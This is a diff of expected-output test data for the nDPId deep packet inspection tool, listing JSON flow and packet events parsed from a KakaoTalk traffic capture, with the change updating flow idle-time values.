+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069170892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170892,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAPxHbOAoYUrwByQGuLDlaBQBWgNSByQAHC4ZVGZBlh61hMGy+mVz7szeLE04wAIGpUs16HTnaFQo\/DwShnbgrVUo6QPfO7hnIEQI6Zble8vC3moejgAAAAXwPCk3m1v5lftk="} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}} @@ -58,61 +58,61 @@ 00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1430069171998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069171998,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAPxHbJAoYUrwByQGuLDlaBQBqX6qByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069172038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172038,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAQBHaJAoYUrwByQGuKB1aBwBqXmKByAAMVJql2trT+4JMtrXIu\/DNYLUyrcCH4nJIkwVlTlKbwLjRHdwKTf1t+cEG2dNtu5tj5fpNWxpJ1GyPSnYq1Tkhei6L7QH9KpD9dMR2BEbVSkSAAAACiCDm5WucO1eQLg=="} 00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1430069172127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAH4AAEAAGhH\/\/AHJAa4KGFK8WgcoHQBqY8SByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069201833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069201833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOw0AAQAYrdAoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtk1IAAABAQgKAALVpswmIb5QFA=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1430069202570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069202570,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxEAAQAYrcwoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkz+AAABAQgKAALV8MwmIb5QFA=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1430069204049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069204049,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxUAAQAYrcgoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkxqAAABAQgKAALWhMwmIb5QFA=="} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069210863,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069210863,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACih+UAAjgbKWq3CdeUKGFK8AbuV7IoFQj5TpMuVUBSklweYAAA="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069211505,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAChd+0AA+AbBg638WIAKGFK8AbvqCPsyGz7Wm7gkUBQAALuKAAA="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTK\/EAAjga+dq38WIAKGFK8AbvqCPsyGz7Wm7gkgBQClSKzAAABAQgKopRXsAACYuQ="} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211639,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069211639,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7560000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069201833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069201833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOw0AAQAYrdAoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtk1IAAABAQgKAALVpswmIb5QFA=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1430069202570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069202570,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxEAAQAYrcwoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkz+AAABAQgKAALV8MwmIb5QFA=="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1430069204049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069204049,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxUAAQAYrcgoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkxqAAABAQgKAALWhMwmIb5QFA=="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069210863,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069210863,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069210863,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACih+UAAjgbKWq3CdeUKGFK8AbuV7IoFQj5TpMuVUBSklweYAAA="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069211505,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAChd+0AA+AbBg638WIAKGFK8AbvqCPsyGz7Wm7gkUBQAALuKAAA="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069211505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTK\/EAAjga+dq38WIAKGFK8AbvqCPsyGz7Wm7gkgBQClSKzAAABAQgKopRXsAACYuQ="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211639,"flow_last_seen":1430069211639,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069211639,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="} 